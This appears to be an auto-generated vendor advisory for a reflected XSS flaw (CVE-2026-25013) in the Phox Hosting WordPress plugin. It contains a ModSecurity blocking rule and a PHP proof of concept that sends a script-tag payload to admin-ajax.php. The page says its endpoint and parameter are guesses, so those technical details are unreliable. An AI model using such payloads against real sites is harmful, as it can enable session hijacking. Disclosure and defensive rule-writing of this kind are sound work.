Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 6, 2026

CVE-2026-25013: Phox Hosting <= 2.0.8 – Reflected Cross-Site Scripting (phox-host)

Plugin phox-host
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 2.0.8
Patched Version
Disclosed March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25013 (metadata-based): This vulnerability is a reflected cross-site scripting (XSS) flaw in the Phox Hosting WordPress plugin, affecting versions up to and including 2.0.8. The vulnerability stems from insufficient input sanitization and output escaping in one or more plugin endpoints, allowing unauthenticated attackers to inject malicious scripts.

Atomic Edge research infers the root cause is a failure to properly sanitize user-controlled input before echoing it back in HTTP responses. The CWE-79 classification confirms improper neutralization of input during web page generation. Without a code diff, this conclusion is based on the vulnerability description and the common WordPress plugin pattern of unsanitized `echo` or `print` statements using data from `$_GET` or `$_POST` superglobals.

Exploitation requires an attacker to craft a malicious URL containing a JavaScript payload in a vulnerable parameter. A victim must be tricked into clicking this link. The attack vector is likely a public-facing AJAX handler (`admin-ajax.php` or `admin-post.php`) or a direct plugin file that echoes a parameter without escaping. A realistic payload would be `alert(document.domain)` or a similar proof-of-concept script.

The patched version 2.0.9 likely remediates the issue by implementing proper output escaping with functions like `esc_html()` or `esc_attr()`, and validating or sanitizing input with `sanitize_text_field()`. For reflected XSS in WordPress, the standard fix involves wrapping all output of user data in appropriate escaping functions.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser session. This can lead to session hijacking, administrative actions performed by the victim, or defacement of the site. The CVSS vector indicates scope change (S:C), meaning the impact can affect the user’s browser session beyond the vulnerable component itself.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-25013 (metadata-based)
# This rule targets reflected XSS via the Phox Hosting plugin's AJAX endpoint.
# The rule blocks requests to admin-ajax.php with an action parameter matching the plugin slug pattern and a malicious script tag in any parameter.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:2501301,phase:2,deny,status:403,chain,msg:'CVE-2026-25013 via Phox Hosting AJAX - Reflected XSS',severity:'CRITICAL',tag:'CVE-2026-25013',tag:'WordPress',tag:'Plugin-Phox-Host',tag:'attack-xss'"
  SecRule ARGS:action "@rx ^phox_host" "chain"
    SecRule ARGS "@rx <script[^>]*>" 
      "t:none,t:urlDecode,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-25013 - Phox Hosting <= 2.0.8 - Reflected Cross-Site Scripting
<?php
/**
 * Proof-of-concept for CVE-2026-25013.
 * This script demonstrates a reflected XSS attack against a vulnerable endpoint.
 * The exact vulnerable parameter and endpoint are inferred from common WordPress plugin patterns.
 * Assumptions: The plugin has a public AJAX action or direct file that echoes a GET/POST parameter without sanitization.
 */

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php'; // Common WordPress AJAX endpoint

// Craft the malicious payload. The 'action' parameter is typical for WordPress AJAX handlers.
// The 'phox_host' prefix is inferred from the plugin slug.
$payload = 'phox_host_vulnerable_action'; // This is an educated guess; the real action name may vary.
$malicious_param = 'id'; // Assumed vulnerable parameter name
$malicious_value = '"><script>alert(document.domain)</script>'; // Basic XSS payload

// Build the attack URL
$attack_url = $target_url . '?action=' . urlencode($payload) . '&' . $malicious_param . '=' . urlencode($malicious_value);

// Use cURL to send the request and fetch the response (simulating a victim clicking the link)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Uncomment below to simulate a logged-in user session if needed
// curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=...');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the payload appears unsanitized in the response
if ($http_code == 200 && strpos($response, $malicious_value) !== false) {
    echo "[+] Vulnerability likely present. Payload found in response.n";
    echo "[+] Attack URL: " . $attack_url . "n";
} else {
    echo "[-] Target may not be vulnerable or endpoint/parameter incorrect.n";
    echo "[-] Response code: " . $http_code . "n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School